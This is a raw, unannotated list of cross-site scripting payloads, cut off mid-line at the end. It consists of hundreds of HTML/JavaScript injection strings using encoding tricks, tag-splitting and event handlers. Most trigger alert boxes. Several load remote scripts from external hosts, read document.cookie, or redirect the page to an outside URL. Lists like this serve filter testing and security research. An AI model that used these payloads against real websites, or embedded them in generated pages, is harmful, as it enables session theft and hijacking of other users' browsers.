SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js?\u0026lt;B\u0026gt;\n\u0026lt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\");//\u0026lt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT/SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;BODY onload!#$%\u0026()*~+-_\u0026#46;,\u0026#58;;?@\u0026#91;/|\\\u0026#93;^`=alert(\\\"XSS\\\")\u0026gt;\n\u0026lt;SCRIPT/XSS SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;IMG SRC=\\\"   javascript\u0026#058;alert('XSS');\\\"\u0026gt;\nperl -e 'print \\\"\u0026lt;SCR\\0IPT\u0026gt;alert(\\\\\"XSS\\\\\")\u0026lt;/SCR\\0IPT\u0026gt;\\\";' \u0026gt; out\nperl -e 'print \\\"\u0026lt;IMG SRC=java\\0script\u0026#058;alert(\\\\\"XSS\\\\\")\u0026gt;\\\";' \u0026gt; out\n\u0026lt;IMG SRC=\\\"jav\u0026#x0D;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;IMG SRC=\\\"jav\u0026#x0A;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;IMG SRC=\\\"jav\u0026#x09;ascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;IMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u0026gt;\n\u0026lt;IMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u0026gt;\n\u0026lt;IMG SRC=javascript\u0026#058;alert(String\u0026#46;fromCharCode(88,83,83))\u0026gt;\n\u0026lt;IMG \\\"\\\"\\\"\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\")\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\n\u0026lt;IMG SRC=`javascript\u0026#058;alert(\\\"RSnake says, 'XSS'\\\")`\u0026gt;\n\u0026lt;IMG SRC=javascript\u0026#058;alert(\u0026quot;XSS\u0026quot;)\u0026gt;\n\u0026lt;IMG SRC=JaVaScRiPt\u0026#058;alert('XSS')\u0026gt;\n\u0026lt;IMG SRC=javascript\u0026#058;alert('XSS')\u0026gt;\n\u0026lt;IMG SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;SCRIPT SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n'';!--\\\"\u0026lt;XSS\u0026gt;=\u0026{()}\n';alert(String\u0026#46;fromCharCode(88,83,83))//\\';alert(String\u0026#46;fromCharCode(88,83,83))//\\\";alert(String\u0026#46;fromCharCode(88,83,83))//\\\\\";alert(String\u0026#46;fromCharCode(88,83,83))//--\u0026gt;\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;'\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(String\u0026#46;fromCharCode(88,83,83))\u0026lt;/SCRIPT\u0026gt;\n\u003cIMG SRC=javascrscriptipt:alert('XSS')\u003e\n\u003cSCRIPT\u003ea=/XSS/alert(a.source)\u003c/SCRIPT\u003e\nexp/*\u003cA STYLE='no\\xss:noxss(\"*//*\");xss:\u0026#101;x\u0026#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'\u003e\n\u003cEMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"\u003e\u003c/EMBED\u003e\na=\"get\";b=\"URL(ja\\\"\";c=\"vascr\";d=\"ipt:ale\";e=\"rt('XSS');\\\")\";eval(a+b+c+d+e);\n\u003cHTML\u003e\u003cBODY\u003e\u003c?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"\u003e\u003c?import namespace=\"t\" implementation=\"#default#time2\"\u003e\u003ct:set attributeName=\"innerHTML\" to=\"XSS\u0026lt;SCRIPT DEFER\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCRIPT\u0026gt;\"\u003e\u003c/BODY\u003e\u003c/HTML\u003e\n\u003cform id=\"test\" /\u003e\u003cbutton form=\"test\" formaction=\"javascript:alert(123)\"\u003eTESTHTML5FORMACTION\n\u003cform\u003e\u003cbutton formaction=\"javascript:alert(123)\"\u003ecrosssitespt\n\u003cframeset onload=alert(123)\u003e\n\u003c!--\u003cimg src=\"--\u003e\u003cimg src=x onerror=alert(123)//\"\u003e\n\u003cstyle\u003e\u003cimg src=\"\u003c/style\u003e\u003cimg src=x onerror=alert(123)//\"\u003e\n\u003cobject data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003e\n\u003cembed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u003e\n\u003c? foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c! foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c/ foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003cscript\u003e({0:#0=alert/#0#/#0#(123)})\u003c/script\u003e\n\u003cscript\u003eReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x\u003c/script\u003e\n\u003cscript\u003eObject.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()\u003c/script\u003e\n\u003cscript src=\"#\"\u003e{alert(1)}\u003c/script\u003e;1\n\u003cscript\u003ecrypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')\u003c/script\u003e\n\u003csvg xmlns=\"#\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003c/svg\u003e\n\u003csvg onload=\"javascript:alert(123)\" xmlns=\"#\"\u003e\u003c/svg\u003e\n\u003ciframe xmlns=\"#\" src=\"javascript:alert(1)\"\u003e\u003c/iframe\u003e\n+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\n%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\n+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\n%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\n%253cscript%253ealert(document.cookie)%253c/script%253e\n“\u003e\u003cs”%2b”cript\u003ealert(document.cookie)\u003c/script\u003e\n“\u003e\u003cScRiPt\u003ealert(document.cookie)\u003c/script\u003e\n“\u003e\u003c\u003cscript\u003ealert(document.cookie);//\u003c\u003c/script\u003e\nfoo\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\u003cscr\u003cscript\u003eipt\u003ealert(document.cookie)\u003c/scr\u003c/script\u003eipt\u003e\n%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E\n‘; alert(document.cookie); var foo=’\nfoo\\’; alert(document.cookie);//’;\n\u003c/script\u003e\u003cscript \u003ealert(document.cookie)\u003c/script\u003e\n\u003cimg src=asdf onerror=alert(document.cookie)\u003e\n\u003cBODY ONLOAD=alert(’XSS’)\u003e\n\u003cscript\u003ealert(1)\u003c/script\u003e\n\"\u003e\u003cscript\u003ealert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))\u003c/script\u003e\n\u003cvideo src=1 onerror=alert(1)\u003e\n\u003caudio src=1 onerror=alert(1)\u003e\n';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n0\\\"autofocus/onfocus=alert(1)--\u003e\u003cvideo/poster/onerror=prompt(2)\u003e\"-confirm(3)-\"\n\u003cscript/src=data:,alert()\u003e\n\u003cmarquee/onstart=alert()\u003e\n\u003cvideo/poster/onerror=alert()\u003e\n\u003cisindex/autofocus/onfocus=alert()\u003e\n\u003cIMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"\u003e\u003c/img\u003e\n\u003cIMG SRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\n\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026\n#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC=\"jav\tascript:alert('XSS');\"\u003e\n\u003c/script\u003e\u003cscript\u003ealert('XSS');\u003c/script\u003e\nexp/*\u003cA STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'\u003e\n\u003c!--[if gte IE 4]\u003e\u003cSCRIPT\u003ealert('XSS');\u003c/SCRIPT\u003e\u003c![endif]--\u003e\n0\\\"autofocus/onfocus=alert(1)--\u003e\u003cvideo/poster/ error=prompt(2)\u003e\"-confirm(3)-\"\nveris--\u003egroup\u003csvg/onload=alert(/XSS/)//\n#\"\u003e\u003cimg src=M onerror=alert('XSS');\u003e\nelement[attribute='\u003cimg src=x onerror=alert('XSS');\u003e\n[\u003cblockquote cite=\"]\"\u003e[\" onmouseover=\"alert('RVRSH3LL_XSS');\" ]\n%22;alert%28%27RVRSH3LL_XSS%29//\njavascript:alert%281%29;\n\u003cw contenteditable id=x onfocus=alert()\u003e\nalert;pg(\"XSS\")\n\u003csvg/onload=%26%23097lert%26lpar;1337)\u003e\n\u003cscript\u003efor((i)in(self))eval(i)(1)\u003c/script\u003e\n\u003cscr\u003cscript\u003eipt\u003ealert(1)\u003c/scr\u003c/script\u003eipt\u003e\u003cscr\u003cscript\u003eipt\u003ealert(1)\u003c/scr\u003c/script\u003eipt\u003e\n\u003csCR\u003cscript\u003eiPt\u003ealert(1)\u003c/SCr\u003c/script\u003eIPt\u003e\n\u003ca href=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\"\u003etest\u003c/a\u003e\n%253Cscript%253Ealert('XSS')%253C%252Fscript%253E\n\u003cIMG SRC=x onafterprint=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onbeforeprint=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onbeforeunload=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onhashchange=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onmessage=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ononline=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onoffline=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onpagehide=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onpageshow=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onpopstate=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onresize=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onstorage=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onunload=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onblur=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onchange=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x oncontextmenu=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x oninput=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x oninvalid=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onreset=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onsearch=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onselect=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onsubmit=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onkeydown=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onkeypress=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onkeyup=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onclick=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondblclick=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onmousedown=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onmousemove=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onmouseout=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onmouseover=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onmouseup=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onmousewheel=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onwheel=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondrag=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondragend=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondragenter=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondragleave=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondragover=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondragstart=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondrop=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onscroll=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x oncopy=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x oncut=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onpaste=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onabort=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x oncanplay=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x oncanplaythrough=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x oncuechange=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ondurationchange=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onemptied=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onended=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onerror=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onloadeddata=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onloadedmetadata=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onloadstart=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onpause=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onplay=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onplaying=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onprogress=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onratechange=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onseeked=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onseeking=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onstalled=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onsuspend=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ontimeupdate=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onvolumechange=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onwaiting=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x onshow=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cIMG SRC=x ontoggle=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cMETA onpaonpageonpagonpageonpageshowshoweshowshowgeshow=\"alert(1)\";\n\u003cIMG SRC=x onload=\"alert(String.fromCharCode(88,83,83))\"\u003e\n\u003cINPUT TYPE=\"BUTTON\" action=\"alert('XSS')\"/\u003e\n\"\u003e\u003c/iframe\u003e\u003cscript\u003ealert(`TEXT YOU WANT TO BE DISPLAYED`);\u003c/script\u003e\u003ciframe frameborder=\"0%EF%BB%BF\n\"\u003e\u003ch1\u003e\u003cIFRAME width=\"420\" height=\"315\" SRC=\"http://www.youtube.com/embed/sxvccpasgTE\" frameborder=\"0\" onmouseover=\"alert(document.cookie)\"\u003e\u003c/IFRAME\u003e123\u003c/h1\u003e\n\"\u003e\u003ch1\u003e\u003ciframe width=\"420\" height=\"315\" src=\"http://www.youtube.com/embed/sxvccpasgTE\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e123\u003c/h1\u003e\n\u003e\u003ch1\u003e\u003cIFRAME width=\"420\" height=\"315\" frameborder=\"0\" onmouseover=\"document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr\ng'\"\u003e\u003c/IFRAME\u003eHover the cursor to the LEFT of this Message\u003c/h1\u003e\u0026ParamHeight=250\n\u003cIFRAME width=\"420\" height=\"315\" frameborder=\"0\" onload=\"alert(document.cookie)\"\u003e\u003c/IFRAME\u003e\n\"\u003e\u003ch1\u003e\u003cIFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\"\u003e123\u003c/h1\u003e\n\"\u003e\u003ch1\u003e\u003cIFRAME SRC=# onmouseover=\"alert(document.cookie)\"\u003e\u003c/IFRAME\u003e123\u003c/h1\u003e\n\u003ciframe src=http://xss.rocks/scriptlet.html \u003c\n\u003csvg\u003e\u003cscript xlink:href=data\u0026colon;,window.open('https://www.google.com/') \u003c/script\n\u003cform\u003e\u003ca href=\"javascript:\\u0061lert\u0026#x28;1\u0026#x29;\"\u003eX\u003c/script\u003e\u003cimg/*/src=\"worksinchrome\u0026colon;prompt\u0026#x28;1\u0026#x29;\"/*/onerror='eval(src)'\u003e\nhttp://www.\u003cscript\u003ealert(1)\u003c/script .com\n\u003ciframe src=j\u0026NewLine;\u0026Tab;a\u0026NewLine;\u0026Tab;\u0026Tab;v\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;a\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;s\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;c\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;r\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;i\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;p\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;t\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026colon;a\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;l\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;e\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;r\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;t\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;28\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;1\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;%29\u003e\u003c/iframe\u003e\n\u003csvg\u003e\u003cscript ?\u003ealert(1)\n\u003cimg src=1 href=1 onerror=\"javascript:alert(1)\"\u003e\u003c/img\u003e\n\u003caudio src=1 href=1 onerror=\"javascript:alert(1)\"\u003e\u003c/audio\u003e\n\u003cvideo src=1 href=1 onerror=\"javascript:alert(1)\"\u003e\u003c/video\u003e\n\u003cbody src=1 href=1 onerror=\"javascript:alert(1)\"\u003e\u003c/body\u003e\n\u003cimage src=1 href=1 onerror=\"javascript:alert(1)\"\u003e\u003c/image\u003e\n\u003cobject src=1 href=1 onerror=\"javascript:alert(1)\"\u003e\u003c/object\u003e\n\u003cscript src=1 href=1 onerror=\"javascript:alert(1)\"\u003e\u003c/script\u003e\n\u003csvg onResize svg onResize=\"javascript:javascript:alert(1)\"\u003e\u003c/svg onResize\u003e\n\u003ctitle onPropertyChange title onPropertyChange=\"javascript:javascript:alert(1)\"\u003e\u003c/title onPropertyChange\u003e\n\u003ciframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"\u003e\u003c/iframe onLoad\u003e\n\u003cbody onMouseEnter body onMouseEnter=\"javascript:javascript:alert(1)\"\u003e\u003c/body onMouseEnter\u003e\n\u003cbody onFocus body onFocus=\"javascript:javascript:alert(1)\"\u003e\u003c/body onFocus\u003e\n\u003cframeset onScroll frameset onScroll=\"javascript:javascript:alert(1)\"\u003e\u003c/frameset onScroll\u003e\n\u003cscript onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1)\"\u003e\u003c/script onReadyStateChange\u003e\n\u003chtml onMouseUp html onMouseUp=\"javascript:javascript:alert(1)\"\u003e\u003c/html onMouseUp\u003e\n\u003cbody onPropertyChange body onPropertyChange=\"javascript:javascript:alert(1)\"\u003e\u003c/body onPropertyChange\u003e\n\u003csvg onLoad svg onLoad=\"javascript:javascript:alert(1)\"\u003e\u003c/svg onLoad\u003e\n\u003cbody onPageHide body onPageHide=\"javascript:javascript:alert(1)\"\u003e\u003c/body onPageHide\u003e\n\u003cbody onMouseOver body onMouseOver=\"javascript:javascript:alert(1)\"\u003e\u003c/body onMouseOver\u003e\n\u003cbody onUnload body onUnload=\"javascript:javascript:alert(1)\"\u003e\u003c/body onUnload\u003e\n\u003cbody onLoad body onLoad=\"javascript:javascript:alert(1)\"\u003e\u003c/body onLoad\u003e\n\u003cbgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1)\"\u003e\u003c/bgsound onPropertyChange\u003e\n\u003chtml onMouseLeave html onMouseLeave=\"javascript:javascript:alert(1)\"\u003e\u003c/html onMouseLeave\u003e\n\u003chtml onMouseWheel html onMouseWheel=\"javascript:javascript:alert(1)\"\u003e\u003c/html onMouseWheel\u003e\n\u003cstyle onLoad style onLoad=\"javascript:javascript:alert(1)\"\u003e\u003c/style onLoad\u003e\n\u003ciframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(1)\"\u003e\u003c/iframe onReadyStateChange\u003e\n\u003cbody onPageShow body onPageShow=\"javascript:javascript:alert(1)\"\u003e\u003c/body onPageShow\u003e\n\u003cstyle onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(1)\"\u003e\u003c/style onReadyStateChange\u003e\n\u003cframeset onFocus frameset onFocus=\"javascript:javascript:alert(1)\"\u003e\u003c/frameset onFocus\u003e\n\u003capplet onError applet onError=\"javascript:javascript:alert(1)\"\u003e\u003c/applet onError\u003e\n\u003cmarquee onStart marquee onStart=\"javascript:javascript:alert(1)\"\u003e\u003c/marquee onStart\u003e\n\u003cscript onLoad script onLoad=\"javascript:javascript:alert(1)\"\u003e\u003c/script onLoad\u003e\n\u003chtml onMouseOver html onMouseOver=\"javascript:javascript:alert(1)\"\u003e\u003c/html onMouseOver\u003e\n\u003chtml onMouseEnter html onMouseEnter=\"javascript:parent.javascript:alert(1)\"\u003e\u003c/html onMouseEnter\u003e\n\u003cbody onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1)\"\u003e\u003c/body onBeforeUnload\u003e\n\u003chtml onMouseDown html onMouseDown=\"javascript:javascript:alert(1)\"\u003e\u003c/html onMouseDown\u003e\n\u003cmarquee onScroll marquee onScroll=\"javascript:javascript:alert(1)\"\u003e\u003c/marquee onScroll\u003e\n\u003cxml onPropertyChange xml onPropertyChange=\"javascript:javascript:alert(1)\"\u003e\u003c/xml onPropertyChange\u003e\n\u003cframeset onBlur frameset onBlur=\"javascript:javascript:alert(1)\"\u003e\u003c/frameset onBlur\u003e\n\u003capplet onReadyStateChange applet onReadyStateChange=\"javascript:javascript:alert(1)\"\u003e\u003c/applet onReadyStateChange\u003e\n\u003csvg onUnload svg onUnload=\"javascript:javascript:alert(1)\"\u003e\u003c/svg onUnload\u003e\n\u003chtml onMouseOut html onMouseOut=\"javascript:javascript:alert(1)\"\u003e\u003c/html onMouseOut\u003e\n\u003cbody onMouseMove body onMouseMove=\"javascript:javascript:alert(1)\"\u003e\u003c/body onMouseMove\u003e\n\u003cbody onResize body onResize=\"javascript:javascript:alert(1)\"\u003e\u003c/body onResize\u003e\n\u003cobject onError object onError=\"javascript:javascript:alert(1)\"\u003e\u003c/object onError\u003e\n\u003cbody onPopState body onPopState=\"javascript:javascript:alert(1)\"\u003e\u003c/body onPopState\u003e\n\u003chtml onMouseMove html onMouseMove=\"javascript:javascript:alert(1)\"\u003e\u003c/html onMouseMove\u003e\n\u003capplet onreadystatechange applet onreadystatechange=\"javascript:javascript:alert(1)\"\u003e\u003c/applet onreadystatechange\u003e\n\u003cbody onpagehide body onpagehide=\"javascript:javascript:alert(1)\"\u003e\u003c/body onpagehide\u003e\n\u003csvg onunload svg onunload=\"javascript:javascript:alert(1)\"\u003e\u003c/svg onunload\u003e\n\u003capplet onerror applet onerror=\"javascript:javascript:alert(1)\"\u003e\u003c/applet onerror\u003e\n\u003cbody onkeyup body onkeyup=\"javascript:javascript:alert(1)\"\u003e\u003c/body onkeyup\u003e\n\u003cbody onunload body onunload=\"javascript:javascript:alert(1)\"\u003e\u003c/body onunload\u003e\n\u003ciframe onload iframe onload=\"javascript:javascript:alert(1)\"\u003e\u003c/iframe onload\u003e\n\u003cbody onload body onload=\"javascript:javascript:alert(1)\"\u003e\u003c/body onload\u003e\n\u003chtml onmouseover html onmouseover=\"javascript:javascript:alert(1)\"\u003e\u003c/html onmouseover\u003e\n\u003cobject onbeforeload object onbeforeload=\"javascript:javascript:alert(1)\"\u003e\u003c/object onbeforeload\u003e\n\u003cbody onbeforeunload body onbeforeunload=\"javascript:javascript:alert(1)\"\u003e\u003c/body onbeforeunload\u003e\n\u003cbody onfocus body onfocus=\"javascript:javascript:alert(1)\"\u003e\u003c/body onfocus\u003e\n\u003cbody onkeydown body onkeydown=\"javascript:javascript:alert(1)\"\u003e\u003c/body onkeydown\u003e\n\u003ciframe onbeforeload iframe onbeforeload=\"javascript:javascript:alert(1)\"\u003e\u003c/iframe onbeforeload\u003e\n\u003ciframe src iframe 